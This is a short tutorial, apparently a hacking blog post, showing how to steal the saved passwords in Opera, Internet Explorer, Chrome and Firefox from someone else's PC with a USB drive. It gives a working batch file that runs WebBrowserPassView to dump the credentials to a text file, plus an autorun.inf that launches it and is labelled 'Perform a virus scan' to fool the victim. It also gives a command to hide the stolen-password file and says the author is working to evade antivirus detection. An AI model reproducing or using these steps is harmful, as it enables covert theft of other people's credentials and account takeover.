Well, in this post you will learn an easy trick makes you take and steal all the passwords from browsers of a PC (Opera, Internet Explorer, Chrome, Firefox) with just plugging the USB drive into itFirst let's explain how it works : we will be using a software, this software recover all the passwords from a browser likeOpera, Internet Explorer, Chrome and Firefox, then we will use a batch file (.bat) to makethis software save all the recovered passwords in one text file.So until now, this software wouldn't work unless the user click the batch file right ?Yes so here we will use an Autorun file to make this software excuse with the plugging of the USB driveLets get to work First all the files we will be working on will be in one single folderFirst downloadWebBrowserPassView.zip from here: WebBrowserPassView
Extract and (notice that some anti-viruses detect it as a virus but it's not) actually I'm working on making it undetectable as a virus
Second : create a new text file and name it "launch" change it's extension to .bat so the file is launch.bat, right click and choose edittry past this code :
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
Now the autorun file : make a new text file and name itautorun and the extension to .inf Open it with text editor and insert thefollowing :
[autorun]
open=launch.bat
ACTION= Perform a virus scan
Then simply save it.Great! now pick up all the files and past them in your USB driveNow when ever the launch.bat is executed, you will notes a text file named "WebBrowserPassView.txt"
One more tip: if you are afraid that the user will open the USB drive and see theWebBrowserPassView.txt text then you can reopen the launch.bat and add this line
attrib H WebBrowserPassView.txt
Warning:- I'm not Responsible for any illegal purposes.


